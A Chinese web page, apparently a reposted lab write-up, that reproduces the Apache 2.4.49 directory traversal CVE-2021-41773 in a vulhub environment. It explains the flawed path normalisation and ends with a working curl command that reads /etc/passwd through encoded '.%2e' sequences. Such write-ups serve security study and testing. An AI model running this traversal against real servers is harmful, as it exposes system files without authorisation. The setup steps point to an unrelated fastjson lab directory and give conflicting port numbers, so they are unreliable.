您好,欢迎来到华佗小知识。
搜索
您的当前位置:首页Apache目录穿越漏洞复现 CVE-2021-41773

Apache目录穿越漏洞复现 CVE-2021-41773

来源:华佗小知识

1.准备:

1.1复现环境

漏洞环境:vulnhub靶场

工具准备:cmd或shell即可

1.2环境启动

cd /home/hbesljx/vulhub/fastjson/1.2.24-rce

docker-compoe启动漏洞环境

docker-compose up -d

访问靶机的8090端口。出现如下即为开启成功!

2.概念说明

Apache是什么

Apache是世界使用排名第一的Web服务器软件。

3.漏洞原理

在 Apache HTTP Server 2.4.49 版本中,在对用户发送的请求中的路径参数进行规范化时,其使用的 ap_normalize_path 函数会对路径参数先进行 url 解码,然后判断是否存在 ../ 的路径穿越符。

当读取到一个%时,若其后两个字符为十六进制,会将其后两个字符进行url解码。

路径中可能有以下三种情况:

(1)%2e./   此时%2e解码为.得到../被检测到存在../

(2).%2e/   此时%2e解码为.继续判断后面为.没有检测到存在../

(3)%2e%2e/   解码为../但检测指针已经移到了/,故也没有检测到存在../

4.漏洞复现

curl -v --path-as-is http://192.168.133.140:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

因篇幅问题不能全部显示,请点此查看更多更全内容

Copyright © 2019- huatuo0.cn 版权所有 湘ICP备2023017654号-2

违法及侵权请联系:TEL:199 18 7713 E-MAIL:2724546146@qq.com

本站由北京市万商天勤律师事务所王兴未律师提供法律服务